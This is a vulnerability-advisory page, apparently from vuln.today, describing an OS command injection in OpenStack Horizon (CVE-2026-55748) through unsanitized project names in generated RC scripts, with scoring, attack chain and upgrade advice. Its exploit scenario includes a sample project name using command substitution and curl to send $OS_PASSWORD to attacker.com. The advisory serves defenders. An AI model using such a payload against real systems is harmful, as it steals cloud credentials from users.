Skip to main content

OpenStack Horizon CVE-2026-55748

MEDIUM
OS Command Injection (CWE-78)
2026-06-17 mitre
6.0
CVSS 3.1 · Vendor: mitre
Share

Severity by source

Vendor (mitre) PRIMARY
6.0 MEDIUM
AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L
vuln.today AI
6.0 MEDIUM

PR:H because project creation requires elevated admin rights; AC:H for the multi-step chain requiring crafted name plus victim execution; UI:R mandatory for victim to source the file.

3.1 AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L
4.0 AV:N/AC:H/AT:P/PR:H/UI:A/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N
Red Hat
6.0 MEDIUM
qualitative

Primary rating from Vendor (mitre).

CVSS VectorVendor: mitre

CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L
Attack Vector
Network
Attack Complexity
High
Privileges Required
High
User Interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
Low

Lifecycle Timeline

1
Analysis Generated
Jun 17, 2026 - 15:39 vuln.today

DescriptionCVE.org

OpenStack Horizon before 25.7.4 produces scripts for OpenStack RC file downloading that may have a crafted project name with shell metacharacters. NOTE: some parties consider this a security hardening opportunity to address certain types of user error, not a vulnerability.

AnalysisAI

OpenStack Horizon before 25.7.4 embeds project names unsanitized into generated OpenStack RC shell scripts, enabling OS command injection when a victim user downloads and sources that script locally. An attacker with sufficient privileges to create or control a project name can insert shell metacharacters (e.g., backtick sequences, command substitution syntax) that execute arbitrary commands in the victim's local shell environment upon RC file execution. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Attacker gains project admin rights
Delivery
Craft project name with shell metacharacters
Exploit
Victim downloads RC file from Horizon
Execution
Victim sources RC file in local shell
Persist
Metacharacters trigger OS command execution
Impact
Local credential or environment compromise

Vulnerability AssessmentAI

Exploitation Exploitation requires the following specific conditions to all be true simultaneously: (1) the attacker must possess OpenStack project creation or project rename privileges - a high-privilege role (PR:H per CVSS) such as cloud admin or a delegated project admin - in order to set a malicious project name containing shell metacharacters; (2) a victim user must subsequently navigate to Horizon, select that specific project, and download the OpenStack RC file for it; and (3) the victim must execute (source) the RC file in a POSIX-compatible shell session. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 base score of 6.0 with vector AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L correctly signals moderate-to-medium real-world risk. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An OpenStack administrator (or any user delegated project creation rights) creates a project named something like 'prod$(curl attacker.com/exfil?k=$OS_PASSWORD)' in a multi-tenant cloud. When a developer or operator navigates to that project in Horizon and downloads the RC file for CLI use, Horizon generates a script containing that unsanitized name. …
Remediation The primary remediation is to upgrade OpenStack Horizon to version 25.7.4 or later, which addresses the unsanitized embedding of project names in RC script generation. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2023-40315 HIGH POC
8.0 Aug 17

In OpenMNS Horizon 31.0.8 and versions earlier than 32.0.2 and related Meridian versions, any user that has the ROLE_FIL

CVE-2023-0872 HIGH POC
8.0 Aug 14

The Horizon REST API includes a users endpoint in OpenMNS Horizon 31.0.8 and versions earlier than 32.0.2 on multiple pl

CVE-2021-25931 HIGH POC
8.8 May 20

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation

CVE-2012-2144 MEDIUM POC
6.8 Jun 05

Session fixation vulnerability in OpenStack Dashboard (Horizon) folsom-1 and 2012.1 allows remote attackers to hijack we

CVE-2012-3540 MEDIUM POC
5.8 Sep 05

Open redirect vulnerability in views/auth_forms.py in OpenStack Dashboard (Horizon) Essex (2012.1) allows remote attacke

CVE-2020-29565 MEDIUM POC
6.1 Dec 04

An issue was discovered in OpenStack Horizon before 15.3.2, 16.x before 16.2.1, 17.x and 18.x before 18.3.3, 18.4.x, and

CVE-2021-25935 MEDIUM POC
5.4 May 25

In OpenNMS Horizon, versions opennms-17.0.0-1 through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2

CVE-2021-25934 MEDIUM POC
5.4 May 25

In OpenNMS Horizon, versions opennms-18.0.0-1 through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2

CVE-2012-3426 MEDIUM POC
4.9 Jul 31

OpenStack Keystone before 2012.1.1, as used in OpenStack Folsom before Folsom-1 and OpenStack Essex, does not properly i

CVE-2023-40313 HIGH
8.8 Aug 17

A BeanShell interpreter in remote server mode runs in OpenMNS Horizon versions earlier than 32.0.2 and in related Meridi

CVE-2021-25933 MEDIUM POC
4.8 May 20

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation

CVE-2021-25929 MEDIUM POC
4.8 May 20

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation

Vendor StatusVendor

Share

CVE-2026-55748 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy